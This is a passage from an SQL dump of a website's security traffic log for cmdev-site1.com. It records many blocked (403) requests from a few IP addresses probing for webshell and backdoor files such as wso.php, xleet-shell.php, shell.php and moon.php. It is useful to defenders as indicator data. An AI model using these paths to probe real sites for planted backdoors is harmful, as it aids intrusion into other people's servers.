Safari\\/537.36\"}','5P7TBeIY1td0fJgyLzUvwiOC',0,1680266263.8408,276,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','RQ3WxHZTMF7hU4uOvno6gBDf',0,1680266264.9469,273,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-content/plugins/seoplugins/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','1zCIAHZgkrULePuDad9Q58jB',0,1680266266.0550,274,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','t02rdgKWTRGo8nBCFPOyJQNm',0,1680266267.1535,288,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','UKcsYqb1rHDz8ydVLlmAjvJf',0,1680266268.2470,289,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Xtpj5vClOVZfD3AQbBaSHr1T',0,1680266269.3334,273,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','T9CwtPYqR2jQV841ISbhmBDg',0,1680266270.9139,290,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','G7nQwJS9Uis2rgXzNkMEptWj',0,1680266272.0533,293,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','BGtI1Ov6JUsEM8lVDxAanXfC',0,1680266273.1501,281,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','dyaA2FoqU7TzC4OWulBmXkNR',0,1680266274.3643,281,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','U7csGBAyOxr6uwlMt5IiV0No',0,1680266275.4673,283,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','uoDBpyZLIt1fXxj5qis0URhE',0,1680266276.6374,316,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','VahELZTJQpR1oKSBMAuvXgC9',0,1680266277.7290,282,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','xj8zI16qSpKdUXrb30wt2imZ',0,1680266278.9379,277,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','g54ew3vRNDZayCp9HW07uXnE',0,1680266280.0589,278,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Pxvlw4j8J5b1uBCmXQkLaDNW',0,1680266281.0772,330,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0wAj3mUCYkhSBM5veitR6Xga',0,1680266282.6076,291,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','kNyav2qKAhWVpezMs6QUiREZ',0,1680266283.6851,286,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','yvNhUbcx3WknQSGI6Tfp7DVe',0,1680266284.7387,277,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','JaDToyh5v7OV3NgHfumEitd6',0,1680266285.8463,302,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','y72q1bozRG0r8VDwxHMnABI4',0,1680266286.9951,299,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','G1yK39pJjrgmbQ7WDNOFBH0d',0,1680266288.2056,285,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0cESxpQhWLbNKlO69nJXIGgv',0,1680266289.3847,279,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','fIMlo3gvATLudyZ9KPVYqr6C',0,1680266290.5236,337,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','FKcOgTtwuzILqov6Yri9NP1U',0,1680266291.7288,280,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/sh.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','CsrkluvZiXjz5cRO31hS0mqf',0,1680266293.0622,316,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','K7SHZ3UMm6YQtzdVxLDEXJA0',0,1680266294.3411,735,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','dEzo62iPMSjHDVhIlgK1f4mQ',0,1680266296.1287,287,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','KjGHuxkcOPaNifphLF7qBb8C',0,1680266297.1497,283,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','IC4eLhGJ3KoxjtsgamiP5fQS',0,1680266298.3244,309,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jliEmxWCHtDFaUyLKZp9cRqJ',0,1680266299.3932,282,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','9WreiKGpbFI7Qa8ACHs2OxT3',0,1680266300.4772,294,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','NBZoJqiSVjgkT67QYhEtn49D',0,1680266301.4494,281,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','iXLsbtv0HQEmAqCRzdOYgfye',0,1680266302.5712,299,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','QS13kLNApnO5DbZqhRo8fX6G',0,1680266303.7449,270,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','aKc01OuWvmhIpETXrtULBDRq',0,1680266304.7804,279,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','uazbZyVK1E5pgMwC62SqlQBk',0,1680266305.9460,319,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','9VOLqoND5yCMmeTrlHXpPiYz',0,1680266307.0620,282,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','wMAkO7H0c8f1uatBp4Cbm5yS',0,1680266308.7589,292,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','D9HeL4gbWBmwjzMtnqQFYxA7',0,1680266309.7850,292,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','YRptZWFjzxwbkqmSNOrG2XDd',0,1680266311.0538,289,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','6UvTYqI0EQGrtaAgDn3RmMjc',0,1680266312.2090,296,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','QOYCHpwFX5ruk4jL6IDRVBnl',0,1680266313.2136,288,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','gbkAKr8Wdyx2SDZUFBOmRlvG',0,1680266314.5525,309,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/uploads/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jvIGuiZDYAzL4dtxMVhowH7Q',0,1680266315.6008,281,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','3GO5Kx82tiJVH4FMgpzdePQU',0,1680266316.7978,285,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','wLBHWy8CoA6i3GOr0Rj2nXh7',0,1680266317.9405,303,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/date.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','iD8nSYspLGyjOZwJHdKUltzC',0,1680266319.1618,277,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','e3t9IgGxLcwpjKyNJU8suz24',0,1680310609.4113,287,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fY3a1iOpnMwej9uTRkJdUScF',0,1680317566.6775,1538,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Vw5Y1xBrN2oA6i0ydE7tRpW9',0,1680317569.2199,310,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','LJ04RdDr1SB2WukYCOgQbh8E',0,1680318194.7142,1729,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','kEqQotAsn6S14d2gIxy5ZLR8',0,1680318197.3119,288,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9Qtfk3qp8udlsHmxX54EnjUF',0,1680318198.2144,294,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NCyP0kDIJS4uE5L8ZReXxVfl',0,1680318200.5284,296,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4ewUpan0tc8x1REGfzMSh2bD',0,1680324980.7202,2307,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FpELmoTCzUfJba2lrIQ9PRtB',0,1680324983.8984,309,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','XHOo3UTds7lM4Ipuf5te1c6E',0,1680324984.8976,305,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','pzCcnhrQeDsM02q7YWyVtUBH',0,1680324985.9718,323,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','sYzXmk3B25wWiO6a4RjoDnM8',0,1680324987.0257,290,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-admin/includes/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','BFOHpg9z0mLWwj4buohJqRAN',0,1680402916.0188,292,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-includes/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','fqLXCw6Be3NbcQHVMl1JDYdr',0,1680402920.2081,283,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/css/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','wz3SfXepRLPnlmUZ7J2utrTq',0,1680402931.3273,369,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/images/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','U73w5Ym82d1NJarBjXqDk0ez',0,1680402934.4212,278,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/languages/plugins/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','MSwn25qGZLe7dzCTKiWR6DaI',0,1680402935.8675,320,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-includes/images/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','bs1rOIMZaYNpne3SCDWRlT2x',0,1680402939.9370,317,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-admin/user/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','wNUk3seKQtI7WnLayMV40f9D',0,1680402944.5393,303,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/languages/moon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','GWQZDogJpOumS197wElFHVUB',0,1680402946.5233,297,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sZP3NfnRWMqi1GzeckogHOm9',0,1680403046.8249,300,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ODSMu82giGHw5BmfNd4l6CXx',0,1680403048.1468,892,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wWx8qN7LsI1V0kjA6MPRDgd2',0,1680403146.5594,284,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','c3LZ8NdXseECTpwg7xz6auQB',0,1680403147.6079,291,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JwgyQClTupbxz8VGI0Kn71L4',0,1680403148.4627,348,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qG5EBcvpf8JQh9LDsSFVy4ig',0,1680403149.5632,322,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 